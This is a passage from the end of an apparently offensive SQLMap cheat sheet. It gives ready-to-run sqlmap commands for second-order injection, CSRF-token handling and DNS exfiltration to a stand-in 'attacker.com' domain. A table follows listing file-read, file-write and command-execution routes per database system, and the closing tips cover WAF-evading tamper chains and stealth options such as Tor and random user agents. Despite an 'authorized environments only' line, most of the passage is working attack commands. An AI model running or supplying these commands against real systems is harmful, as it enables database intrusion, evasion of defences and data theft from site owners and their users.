    623 # Inject payload on registration page, check profile page for effect
    624 sqlmap -u "http://site.com/register" \
    625   --data="username=test&email=test@test.com" \
    626   --second-url="http://site.com/profile" \
    627   --batch
    628 ```
    629 
    630 ### 9. CSRF Token Handling + Auth
    631 ```bash
    632 sqlmap -u "http://site.com/search" \
    633   --cookie="PHPSESSID=abc123" \
    634   --data="q=test&csrf=placeholder" \
    635   --csrf-token="csrf" \
    636   --csrf-url="http://site.com/search" \
    637   --batch
    638 ```
    639 
    640 ### 10. DNS Exfiltration (Blind + Firewall Bypass)
    641 ```bash
    642 sqlmap -u URL --dns-domain="attacker.com" --batch
    643 # Requires: DNS server under your control listening for subdomain queries
    644 ```
    645 
    646 ---
    647 
    648 ## Quick Reference: Common DBMS Injection Spots
    649 
    650 | DBMS | Key Functions | File Read | File Write | Command Exec |
    651 |:---|:---|:---|:---|:---|
    652 | **MySQL** | `LOAD_FILE()`, `INTO OUTFILE` | ✓ | ✓ (requires perms) | Via UDF (DBA only) |
    653 | **MSSQL** | `xp_cmdshell`, `OPENROWSET` | ✓ (`BULK INSERT`) | ✓ | ✓ (via `xp_cmdshell`) |
    654 | **PostgreSQL** | `COPY`, `pg_read_file()` | ✓ | ✓ | ✓ (via `COPY TO PROGRAM`) |
    655 | **Oracle** | `UTL_FILE`, `DBMS_LOB` | ✓ (DBA) | ✓ (DBA) | Via Java stored procedures (DBA) |
    656 | **SQLite** | `load_extension()` | ✗ (limited) | ✗ (limited) | Via custom extension (rare) |
    657 
    658 ---
    659 
    660 ## Final Notes
    661 
    662 * **Always test in authorized environments only.**
    663 * Combine flags intelligently: high `--level`/`--risk` with `--threads` can overwhelm servers.
    664 * Use `--batch` for automated scans; remove for manual control.
    665 * When WAF detected, chain multiple tampers: `--tamper=between,randomcase,space2comment,charencode`.
    666 * For maximum stealth: `--tor`, `--random-agent`, `--delay`, single thread.
    667 * Session management: Use `--flush-session` when changing targets or flags significantly.
    668 * RTFM: `sqlmap -hh` for advanced help.
    669 
    670 **This cheat sheet is comprehensive but not exhaustive. Always refer to the official SQLMap documentation and use `-hh` for complete flag details.**